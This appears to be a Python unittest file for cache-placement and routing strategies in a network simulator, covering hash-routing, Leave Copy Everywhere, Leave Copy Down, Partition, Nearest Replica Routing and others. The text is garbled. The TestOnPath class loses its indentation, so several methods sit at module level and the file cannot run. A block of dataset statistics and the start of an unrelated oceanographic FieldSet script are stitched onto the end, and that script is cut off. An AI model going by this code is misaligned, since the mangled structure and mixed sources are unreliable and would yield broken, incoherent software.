        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(0, 1), (1, 2), (2, 3), (3, 4)}
        exp_cont_hops = {(4, 3), (3, 2), (4, 5), (5, 0)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))
        # At time 2 repeat request, expect cache hit
        hr.process_event(2, 0, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(len(loc), 2)
        self.assertIn(2, loc)
        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(0, 1), (1, 2)}
        exp_cont_hops = {(2, 1), (1, 0)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))
        # Now request from node 6, expect hit
        hr.process_event(3, 6, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(len(loc), 2)
        self.assertIn(2, loc)
        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(6, 2)}
        exp_cont_hops = {(2, 6)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))

    def test_hashrouting_hybrid_sm(self):
        """Hybrid SM hash-routing: choose symmetric or multicast delivery,
        whichever costs fewer hops."""
        hr = strategy.HashroutingHybridSM(self.view, self.controller)
        hr.authoritative_cache = lambda x: x
        # At time 1, receiver 0 requests content 3, expect multicast
        hr.process_event(1, 0, 3, True)
        loc = self.view.content_locations(3)
        self.assertEqual(len(loc), 2)
        self.assertIn(3, loc)
        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(0, 1), (1, 2), (2, 3), (3, 4)}
        exp_cont_hops = {(4, 5), (5, 0), (4, 3)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))
        # At time 2, receiver 0 requests content 5, expect symm = mcast = asymm
        hr.process_event(2, 0, 5, True)
        loc = self.view.content_locations(5)
        self.assertEqual(len(loc), 2)
        self.assertIn(5, loc)
        self.assertIn(4, loc)
        summary = self.collector.session_summary()
        exp_req_hops = {(0, 5), (5, 4)}
        exp_cont_hops = {(4, 5), (5, 0)}
        req_hops = summary['request_hops']
        cont_hops = summary['content_hops']
        self.assertSetEqual(exp_req_hops, set(req_hops))
        self.assertSetEqual(exp_cont_hops, set(cont_hops))

    def test_hashrouting_hybrid_sm_multi_options(self):
        # NOTE: The following test case will fail because NetworkX returns as
        # shortest path from 4 to 1: 4-5-0-1. There is also another shortest
        # path: 4-3-2-1. The best delivery strategy overall would be multicast
        # but because of NetworkX selecting the least convenient shortest path
        # the computed solution is symmetric with path: 4-5-0-1-2-6.
        pass
        # # At time 1, receiver 6 requests content 1, expect multicast
        # hr = strategy.HashroutingHybridSM(self.view, self.controller)
        # hr.authoritative_cache = lambda x: x
        # hr.process_event(1, 6, 1, True)
        # loc = self.view.content_locations(1)
        # self.assertEqual(len(loc), 2)
        # self.assertIn(1, loc)
        # self.assertIn(4, loc)
        # summary = self.collector.session_summary()
        # exp_req_hops = set(((6, 2), (2, 1), (1, 2), (2, 3), (3, 4)))
        # exp_cont_hops = set(((4, 3), (3, 2), (2, 1), (2, 6)))
        # req_hops = summary['request_hops']
        # cont_hops = summary['content_hops']
        # self.assertSetEqual(exp_req_hops, set(req_hops))
        # self.assertSetEqual(exp_cont_hops, set(cont_hops))
class TestOnPath(unittest.TestCase):
    @classmethod
    def setUpClass(cls):
        # No class-level fixtures needed; kept for symmetry with tearDownClass.
        pass
    @classmethod
    def tearDownClass(cls):
        # Nothing to clean up at class level.
        pass
@classmethod
def on_path_topology(cls):
"""Return topology for testing on-path caching strategies
"""
# Topology sketch
#
# 0 ---- 1 ---- 2 ---- 3 ---- 4
# |
# |
# 5
#
topology = IcnTopology(fnss.line_topology(5))
topology.add_edge(2, 5)
source = 4
receivers = (0, 5)
caches = (1, 2, 3)
contents = caches
fnss.add_stack(topology, source, 'source', {'contents': contents})
for v in caches:
fnss.add_stack(topology, v, 'router', {'cache_size': 1})
for v in receivers:
fnss.add_stack(topology, v, 'receiver', {})
return topology
def setUp(self):
topology = self.on_path_topology()
model = NetworkModel(topology, cache_policy={'name': 'FIFO'})
self.view = NetworkView(model)
self.controller = NetworkController(model)
self.collector = DummyCollector(self.view)
self.controller.attach_collector(self.collector)
    def tearDown(self):
        # All fixtures are plain objects rebuilt in setUp; nothing to release.
        pass
def test_lce_same_content(self):
hr = strategy.LeaveCopyEverywhere(self.view, self.controller)
# receiver 0 requests 2, expect miss
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 4)
self.assertIn(1, loc)
self.assertIn(2, loc)
self.assertIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(0, 1), (1, 2), (2, 3), (3, 4)]
exp_cont_hops = [(4, 3), (3, 2), (2, 1), (1, 0)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
# receiver 0 requests 2, expect hit
hr.process_event(1, 5, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 4)
self.assertIn(1, loc)
self.assertIn(2, loc)
self.assertIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((5, 2),))
exp_cont_hops = set(((2, 5),))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
def test_lce_different_content(self):
hr = strategy.LeaveCopyEverywhere(self.view, self.controller)
# receiver 0 requests 2, expect miss
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 4)
self.assertIn(1, loc)
self.assertIn(2, loc)
self.assertIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(0, 1), (1, 2), (2, 3), (3, 4)]
exp_cont_hops = [(4, 3), (3, 2), (2, 1), (1, 0)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
# request content 3 from 5
hr.process_event(1, 5, 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 3)
self.assertIn(2, loc)
self.assertIn(3, loc)
self.assertIn(4, loc)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(1, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(5, 2), (2, 3), (3, 4)]
exp_cont_hops = [(4, 3), (3, 2), (2, 5)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
# request content 3 from , hit in 2
hr.process_event(1, 0, 3, True)
loc = self.view.content_locations(3)
self.assertEquals(len(loc), 4)
self.assertIn(1, loc)
self.assertIn(2, loc)
self.assertIn(3, loc)
self.assertIn(4, loc)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 1)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = set(((0, 1), (1, 2)))
exp_cont_hops = set(((2, 1), (1, 0)))
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(exp_req_hops, set(req_hops))
self.assertSetEqual(exp_cont_hops, set(cont_hops))
def test_edge(self):
hr = strategy.Edge(self.view, self.controller)
# receiver 0 requests 2, expect miss
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(1, loc)
self.assertNotIn(2, loc)
self.assertNotIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(0, 1), (1, 2), (2, 3), (3, 4)]
exp_cont_hops = [(4, 3), (3, 2), (2, 1), (1, 0)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(4, summary['serving_node'])
# receiver 0 requests 2, expect hit
hr.process_event(1, 0, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 2)
self.assertIn(1, loc)
self.assertNotIn(2, loc)
self.assertNotIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(0, 1)]
exp_cont_hops = [(1, 0)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(1, summary['serving_node'])
hr.process_event(1, 5, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 3)
self.assertIn(1, loc)
self.assertIn(2, loc)
self.assertNotIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(5, 2), (2, 3), (3, 4)]
exp_cont_hops = [(4, 3), (3, 2), (2, 5)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(4, summary['serving_node'])
hr.process_event(1, 5, 2, True)
loc = self.view.content_locations(2)
self.assertEquals(len(loc), 3)
self.assertIn(1, loc)
self.assertIn(2, loc)
self.assertNotIn(3, loc)
self.assertIn(4, loc)
summary = self.collector.session_summary()
exp_req_hops = [(5, 2)]
exp_cont_hops = [(2, 5)]
req_hops = summary['request_hops']
cont_hops = summary['content_hops']
self.assertSetEqual(set(exp_req_hops), set(req_hops))
self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
self.assertEqual(2, summary['serving_node'])
def test_lcd(self):
    """Test Leave Copy Down: a hit replicates the content one hop
    closer to the receiver; a miss caches only at the edge node.

    Uses the deprecated-free ``assertEqual`` (``assertEquals`` was
    removed in Python 3.12).
    """
    hr = strategy.LeaveCopyDown(self.view, self.controller)
    # receiver 0 requests 2, expect miss
    hr.process_event(1, 0, 2, True)
    loc = self.view.content_locations(2)
    self.assertEqual(len(loc), 2)
    self.assertIn(3, loc)
    self.assertIn(4, loc)
    summary = self.collector.session_summary()
    exp_req_hops = [(0, 1), (1, 2), (2, 3), (3, 4)]
    exp_cont_hops = [(4, 3), (3, 2), (2, 1), (1, 0)]
    req_hops = summary['request_hops']
    cont_hops = summary['content_hops']
    self.assertSetEqual(set(exp_req_hops), set(req_hops))
    self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
    # receiver 0 requests 2, expect hit in 3
    hr.process_event(1, 0, 2, True)
    loc = self.view.content_locations(2)
    self.assertEqual(len(loc), 3)
    self.assertIn(2, loc)
    self.assertIn(3, loc)
    self.assertIn(4, loc)
    summary = self.collector.session_summary()
    exp_req_hops = set(((0, 1), (1, 2), (2, 3)))
    exp_cont_hops = set(((3, 2), (2, 1), (1, 0)))
    req_hops = summary['request_hops']
    cont_hops = summary['content_hops']
    self.assertSetEqual(exp_req_hops, set(req_hops))
    self.assertSetEqual(exp_cont_hops, set(cont_hops))
    # receiver 0 requests 2, expect hit in 2
    hr.process_event(1, 0, 2, True)
    loc = self.view.content_locations(2)
    self.assertEqual(len(loc), 4)
    self.assertIn(1, loc)
    self.assertIn(2, loc)
    self.assertIn(3, loc)
    self.assertIn(4, loc)
    summary = self.collector.session_summary()
    exp_req_hops = [(0, 1), (1, 2)]
    exp_cont_hops = [(2, 1), (1, 0)]
    req_hops = summary['request_hops']
    cont_hops = summary['content_hops']
    self.assertSetEqual(set(exp_req_hops), set(req_hops))
    self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
    # receiver 0 requests 2, expect hit in 1
    hr.process_event(1, 0, 2, True)
    loc = self.view.content_locations(2)
    self.assertEqual(len(loc), 4)
    self.assertIn(1, loc)
    self.assertIn(2, loc)
    self.assertIn(3, loc)
    self.assertIn(4, loc)
    summary = self.collector.session_summary()
    exp_req_hops = [(0, 1)]
    exp_cont_hops = [(1, 0)]
    req_hops = summary['request_hops']
    cont_hops = summary['content_hops']
    self.assertSetEqual(set(exp_req_hops), set(req_hops))
    self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
    # receiver 0 requests 3, expect miss and eviction of 2 from 3
    hr.process_event(1, 0, 3, True)
    loc = self.view.content_locations(2)
    self.assertEqual(len(loc), 3)
    self.assertIn(1, loc)
    self.assertIn(2, loc)
    self.assertIn(4, loc)
    loc = self.view.content_locations(3)
    self.assertEqual(len(loc), 2)
    self.assertIn(3, loc)
    self.assertIn(4, loc)
    summary = self.collector.session_summary()
    exp_req_hops = [(0, 1), (1, 2), (2, 3), (3, 4)]
    exp_cont_hops = [(4, 3), (3, 2), (2, 1), (1, 0)]
    req_hops = summary['request_hops']
    cont_hops = summary['content_hops']
    self.assertSetEqual(set(exp_req_hops), set(req_hops))
    self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
def test_cl4m(self):
    """Test Cache Less For More: content is cached only at the node
    with the greatest centrality along the delivery path.

    Replaces the deprecated ``assertEquals`` alias (removed in
    Python 3.12) with ``assertEqual``.
    """
    hr = strategy.CacheLessForMore(self.view, self.controller)
    # receiver 0 requests 2, expect miss
    hr.process_event(1, 0, 2, True)
    loc = self.view.content_locations(2)
    self.assertEqual(len(loc), 2)
    self.assertIn(2, loc)
    self.assertIn(4, loc)
    summary = self.collector.session_summary()
    exp_req_hops = [(0, 1), (1, 2), (2, 3), (3, 4)]
    exp_cont_hops = [(4, 3), (3, 2), (2, 1), (1, 0)]
    req_hops = summary['request_hops']
    cont_hops = summary['content_hops']
    self.assertSetEqual(set(exp_req_hops), set(req_hops))
    self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
    # receiver 0 requests 2, expect hit
    hr.process_event(1, 0, 2, True)
    loc = self.view.content_locations(2)
    self.assertEqual(len(loc), 3)
    self.assertIn(1, loc)
    self.assertIn(2, loc)
    self.assertIn(4, loc)
    summary = self.collector.session_summary()
    exp_req_hops = [(0, 1), (1, 2)]
    exp_cont_hops = [(2, 1), (1, 0)]
    req_hops = summary['request_hops']
    cont_hops = summary['content_hops']
    self.assertSetEqual(set(exp_req_hops), set(req_hops))
    self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
    # receiver 0 requests 3, expect miss
    hr.process_event(1, 0, 3, True)
    loc = self.view.content_locations(2)
    self.assertEqual(len(loc), 2)
    self.assertIn(1, loc)
    self.assertIn(4, loc)
    loc = self.view.content_locations(3)
    self.assertEqual(len(loc), 2)
    self.assertIn(2, loc)
    self.assertIn(4, loc)
    summary = self.collector.session_summary()
    exp_req_hops = [(0, 1), (1, 2), (2, 3), (3, 4)]
    exp_cont_hops = [(4, 3), (3, 2), (2, 1), (1, 0)]
    req_hops = summary['request_hops']
    cont_hops = summary['content_hops']
    self.assertSetEqual(set(exp_req_hops), set(req_hops))
    self.assertSetEqual(set(exp_cont_hops), set(cont_hops))
def test_random_choice(self):
    """Test Random Choice: content is cached at one randomly selected
    node on the delivery path, so exactly two locations hold it after
    a miss (the chosen cache plus the source, node 4).

    Replaces deprecated ``assertEquals`` with ``assertEqual``.
    """
    hr = strategy.RandomChoice(self.view, self.controller)
    hr.process_event(1, 0, 2, True)
    loc = self.view.content_locations(2)
    self.assertEqual(len(loc), 2)
    self.assertIn(4, loc)
    summary = self.collector.session_summary()
    self.assertEqual(4, summary['serving_node'])
def test_random_bernoulli(self):
    """Test Random Bernoulli caching with the default probability:
    whatever nodes cache, the source (node 4) must keep the content
    and must serve the first (cold) request.
    """
    strat = strategy.RandomBernoulli(self.view, self.controller)
    strat.process_event(1, 0, 2, True)
    locations = self.view.content_locations(2)
    self.assertIn(4, locations)
    session = self.collector.session_summary()
    self.assertEqual(4, session['serving_node'])
def test_random_bernoulli_p_0(self):
    """Test Random Bernoulli with p=0: no router ever caches, so both
    requests travel to the source (node 4) and only it holds content 2.
    """
    strat = strategy.RandomBernoulli(self.view, self.controller, p=0)
    # Two identical requests: the second must still miss everywhere.
    for _ in range(2):
        strat.process_event(1, 0, 2, True)
        locations = self.view.content_locations(2)
        for router in (1, 2, 3):
            self.assertNotIn(router, locations)
        self.assertIn(4, locations)
        session = self.collector.session_summary()
        self.assertEqual(4, session['serving_node'])
def test_random_bernoulli_p_1(self):
    """Test Random Bernoulli with p=1: every on-path node caches, so the
    first request is served by the source (4) and the second by the
    edge cache (1).
    """
    strat = strategy.RandomBernoulli(self.view, self.controller, p=1)
    for expected_server in (4, 1):
        strat.process_event(1, 0, 2, True)
        locations = self.view.content_locations(2)
        for node in (1, 2, 3, 4):
            self.assertIn(node, locations)
        session = self.collector.session_summary()
        self.assertEqual(expected_server, session['serving_node'])
class TestPartition(unittest.TestCase):
    """Test suite for the Partition strategy.

    Two caches (c1, c2) each serve one receiver (r1, r2); a request must
    be resolved only by the cache assigned to the requesting receiver or
    by the source s1.  Uses ``assertEqual`` instead of the deprecated
    ``assertEquals`` alias (removed in Python 3.12).
    """

    @classmethod
    def setUpClass(cls):
        pass

    @classmethod
    def tearDownClass(cls):
        pass

    @classmethod
    def partition_topology(cls):
        """Return the two-partition test topology.

        #    +-- s1 --+
        #   /    |     \\
        # c1-----[]----c2
        #      /    \\
        #     r1    r2
        """
        topo = fnss.Topology()
        icr_candidates = ["c1", "router", "c2"]
        topo.add_path(icr_candidates)
        topo.add_edge("r1", "router")
        topo.add_edge("r2", "router")
        topo.add_edge("c1", "s1")
        topo.add_edge("c2", "s1")
        topo.graph['icr_candidates'] = set(icr_candidates)
        contents = (1, 2, 3, 4)
        for router in icr_candidates:
            if router in ("c1", "c2"):
                props = {'cache_size': 1}
            # NOTE(review): when router == "router" this reuses the props
            # dict left over from "c1", so the plain router also gets a
            # cache_size of 1 -- confirm this is intended.
            fnss.add_stack(topo, router, 'router', **props)
        for src in ['s1']:
            fnss.add_stack(topo, src, 'source', {'contents': contents})
        for rcv in ['r1', 'r2']:
            fnss.add_stack(topo, rcv, 'receiver')
        topo.graph['cache_assignment'] = {"r1": "c1", "r2": "c2"}
        return IcnTopology(topo)

    def setUp(self):
        # Fresh model, view, controller and collector for every test.
        topology = self.partition_topology()
        model = NetworkModel(topology, cache_policy={'name': 'FIFO'})
        self.view = NetworkView(model)
        self.controller = NetworkController(model)
        self.collector = DummyCollector(self.view)
        self.controller.attach_collector(self.collector)

    def tearDown(self):
        pass

    def test(self):
        """Requests from each partition are served only within it."""
        hr = strategy.Partition(self.view, self.controller)
        # receiver r1 requests 2, expect miss served by the source via c1
        hr.process_event(1, "r1", 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(2, len(loc))
        self.assertIn("s1", loc)
        self.assertIn("c1", loc)
        self.assertNotIn("c2", loc)
        summary = self.collector.session_summary()
        exp_req_hops = [("r1", "router"), ("router", "c1"), ("c1", "s1")]
        exp_cont_hops = [("s1", "c1"), ("c1", "router"), ("router", "r1")]
        self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
        self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
        self.assertEqual("s1", summary['serving_node'])
        # receiver r1 requests 2 again, expect hit in c1
        hr.process_event(1, "r1", 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(2, len(loc))
        self.assertIn("s1", loc)
        self.assertIn("c1", loc)
        self.assertNotIn("c2", loc)
        summary = self.collector.session_summary()
        exp_req_hops = [("r1", "router"), ("router", "c1")]
        exp_cont_hops = [("c1", "router"), ("router", "r1")]
        self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
        self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
        self.assertEqual("c1", summary['serving_node'])
        # Now try with other partition
        hr.process_event(1, "r2", 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(3, len(loc))
        self.assertIn("s1", loc)
        self.assertIn("c1", loc)
        self.assertIn("c2", loc)
        summary = self.collector.session_summary()
        exp_req_hops = [("r2", "router"), ("router", "c2"), ("c2", "s1")]
        exp_cont_hops = [("s1", "c2"), ("c2", "router"), ("router", "r2")]
        self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
        self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
        self.assertEqual("s1", summary['serving_node'])
        hr.process_event(1, "r2", 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(3, len(loc))
        self.assertIn("s1", loc)
        self.assertIn("c1", loc)
        self.assertIn("c2", loc)
        summary = self.collector.session_summary()
        exp_req_hops = [("r2", "router"), ("router", "c2")]
        exp_cont_hops = [("c2", "router"), ("router", "r2")]
        self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
        self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
        self.assertEqual("c2", summary['serving_node'])
class TestNrr(unittest.TestCase):
    """Test suite for Nearest Replica Routing strategies.

    Requests are routed to the closest node holding a replica rather than
    always toward the source.  Uses ``assertEqual`` instead of the
    deprecated ``assertEquals`` alias (removed in Python 3.12).
    """

    @classmethod
    def setUpClass(cls):
        pass

    @classmethod
    def tearDownClass(cls):
        pass

    @classmethod
    def nrr_topology(cls):
        """Return topology for testing NRR caching strategies."""
        # Topology sketch
        #
        #  0 ---- 2----- 4
        #         |       \
        #         |        s
        #         |       /
        #  1 ---- 3 ---- 5
        #
        topology = IcnTopology(fnss.Topology())
        topology.add_path([0, 2, 4, "s", 5, 3, 1])
        topology.add_edge(2, 3)
        receivers = (0, 1)
        source = "s"
        caches = (2, 3, 4, 5)
        contents = (1, 2, 3, 4)
        fnss.add_stack(topology, source, 'source', {'contents': contents})
        for v in caches:
            fnss.add_stack(topology, v, 'router', {'cache_size': 1})
        for v in receivers:
            fnss.add_stack(topology, v, 'receiver', {})
        fnss.set_delays_constant(topology, 1, 'ms')
        return topology

    def setUp(self):
        # Fresh model, view, controller and collector for every test.
        topology = self.nrr_topology()
        model = NetworkModel(topology, cache_policy={'name': 'FIFO'})
        self.view = NetworkView(model)
        self.controller = NetworkController(model)
        self.collector = DummyCollector(self.view)
        self.controller.attach_collector(self.collector)

    def tearDown(self):
        pass

    def test_lce(self):
        """NRR with LCE metacaching: every on-path node caches."""
        hr = strategy.NearestReplicaRouting(self.view, self.controller, metacaching='LCE')
        # receiver 0 requests 2, expect miss
        hr.process_event(1, 0, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(3, len(loc))
        self.assertIn(2, loc)
        self.assertIn(4, loc)
        self.assertIn("s", loc)
        self.assertNotIn(3, loc)
        self.assertNotIn(5, loc)
        summary = self.collector.session_summary()
        exp_req_hops = [(0, 2), (2, 4), (4, "s")]
        exp_cont_hops = [("s", 4), (4, 2), (2, 0)]
        self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
        self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
        self.assertEqual("s", summary['serving_node'])
        # receiver 1 fetches from nearest replica at 2 (not the source)
        hr.process_event(1, 1, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(4, len(loc))
        self.assertIn(2, loc)
        self.assertIn(4, loc)
        self.assertIn("s", loc)
        self.assertIn(3, loc)
        self.assertNotIn(5, loc)
        summary = self.collector.session_summary()
        exp_req_hops = [(1, 3), (3, 2)]
        exp_cont_hops = [(2, 3), (3, 1)]
        self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
        self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
        self.assertEqual(2, summary['serving_node'])
        # second request from receiver 1 now hits the replica at 3
        hr.process_event(1, 1, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(4, len(loc))
        self.assertIn(2, loc)
        self.assertIn(4, loc)
        self.assertIn("s", loc)
        self.assertIn(3, loc)
        self.assertNotIn(5, loc)
        summary = self.collector.session_summary()
        exp_req_hops = [(1, 3)]
        exp_cont_hops = [(3, 1)]
        self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
        self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
        self.assertEqual(3, summary['serving_node'])

    def test_lcd(self):
        """NRR with LCD metacaching: a copy moves one hop per request."""
        hr = strategy.NearestReplicaRouting(self.view, self.controller, metacaching='LCD')
        # receiver 0 requests 2, expect miss; only node 4 caches (LCD)
        hr.process_event(1, 0, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(2, len(loc))
        self.assertNotIn(2, loc)
        self.assertIn(4, loc)
        self.assertIn("s", loc)
        self.assertNotIn(3, loc)
        self.assertNotIn(5, loc)
        summary = self.collector.session_summary()
        exp_req_hops = [(0, 2), (2, 4), (4, "s")]
        exp_cont_hops = [("s", 4), (4, 2), (2, 0)]
        self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
        self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
        self.assertEqual("s", summary['serving_node'])
        # second request: hit at 4, copy pushed down to 2
        hr.process_event(1, 0, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(3, len(loc))
        self.assertIn(2, loc)
        self.assertIn(4, loc)
        self.assertIn("s", loc)
        self.assertNotIn(3, loc)
        self.assertNotIn(5, loc)
        summary = self.collector.session_summary()
        exp_req_hops = [(0, 2), (2, 4)]
        exp_cont_hops = [(4, 2), (2, 0)]
        self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
        self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
        self.assertEqual(4, summary['serving_node'])
        # receiver 1 reaches the nearest replica at 2; copy pushed to 3
        hr.process_event(1, 1, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(4, len(loc))
        self.assertIn(2, loc)
        self.assertIn(4, loc)
        self.assertIn("s", loc)
        self.assertIn(3, loc)
        self.assertNotIn(5, loc)
        summary = self.collector.session_summary()
        exp_req_hops = [(1, 3), (3, 2)]
        exp_cont_hops = [(2, 3), (3, 1)]
        self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
        self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
        self.assertEqual(2, summary['serving_node'])
        # now the replica at 3 serves receiver 1 directly
        hr.process_event(1, 1, 2, True)
        loc = self.view.content_locations(2)
        self.assertEqual(4, len(loc))
        self.assertIn(2, loc)
        self.assertIn(4, loc)
        self.assertIn("s", loc)
        self.assertIn(3, loc)
        self.assertNotIn(5, loc)
        summary = self.collector.session_summary()
        exp_req_hops = [(1, 3)]
        exp_cont_hops = [(3, 1)]
        self.assertSetEqual(set(exp_req_hops), set(summary['request_hops']))
        self.assertSetEqual(set(exp_cont_hops), set(summary['content_hops']))
        self.assertEqual(3, summary['serving_node'])
| 43.843354
| 90
| 0.598855
| 11,054
| 83,127
| 4.324046
| 0.023521
| 0.050086
| 0.038077
| 0.067283
| 0.949914
| 0.942864
| 0.939788
| 0.936336
| 0.935248
| 0.927884
| 0
| 0.035878
| 0.257317
| 83,127
| 1,895
| 91
| 43.866491
| 0.738342
| 0.075607
| 0
| 0.910319
| 0
| 0
| 0.054104
| 0
| 0
| 0
| 0
| 0
| 0.413391
| 1
| 0.041155
| false
| 0.013514
| 0.003071
| 0
| 0.052826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1a276002107901b911a3503cde6ffe83e6c0ed9f
| 5,961
|
py
|
Python
|
low_spatial_res/setfieldsets.py
|
pdnooteboom/PO_res_error
|
2c0e1f12203585e2ca3f9a5e686b4e8004052884
|
[
"MIT"
] | 1
|
2021-04-12T16:07:42.000Z
|
2021-04-12T16:07:42.000Z
|
low_spatial_res/setfieldsets.py
|
pdnooteboom/PO_res_error
|
2c0e1f12203585e2ca3f9a5e686b4e8004052884
|
[
"MIT"
] | null | null | null |
low_spatial_res/setfieldsets.py
|
pdnooteboom/PO_res_error
|
2c0e1f12203585e2ca3f9a5e686b4e8004052884
|
[
"MIT"
] | 1
|
2021-04-12T16:07:45.000Z
|
2021-04-12T16:07:45.000Z
|
from parcels import FieldSet
def set_pop_fieldset(ufiles, dimfiles, dfile, bfile, afile, indices=None):
    """Create a parcels FieldSet for POP model output with U, V, W, T, S,
    bathymetry ('B') and cell-area fields.

    Parameters
    ----------
    ufiles : velocity/tracer data file(s) holding UVEL, VVEL, WVEL, TEMP, SALT
    dimfiles : unused; kept for backward compatibility with existing callers
    dfile : file providing the depth dimension ('w_dep')
    bfile : file providing the lon/lat grid and the Bathymetry variable
    afile : file providing the cell-area (UAREA) data
    indices : optional dict restricting the grid indices loaded by parcels

    Returns
    -------
    parcels FieldSet with velocity caps applied and static fields allowed
    to extrapolate in time.
    """
    def _grid_files(data):
        # All fields share the same lon/lat/depth grid files; only the
        # data source differs.
        return {'lon': bfile, 'lat': bfile, 'depth': dfile, 'data': data}

    filenames = {'U': _grid_files(ufiles),
                 'V': _grid_files(ufiles),
                 'W': _grid_files(ufiles),
                 'S': _grid_files(ufiles),
                 'T': _grid_files(ufiles),
                 'B': _grid_files(bfile),
                 'cell_areas': _grid_files(afile)}
    variables = {'U': 'UVEL',
                 'V': 'VVEL',
                 'W': 'WVEL',
                 'cell_areas': 'UAREA',
                 'T': 'TEMP',
                 'S': 'SALT',
                 'B': 'Bathymetry'}
    # Every time-varying field uses the same 4-D dimension names; the
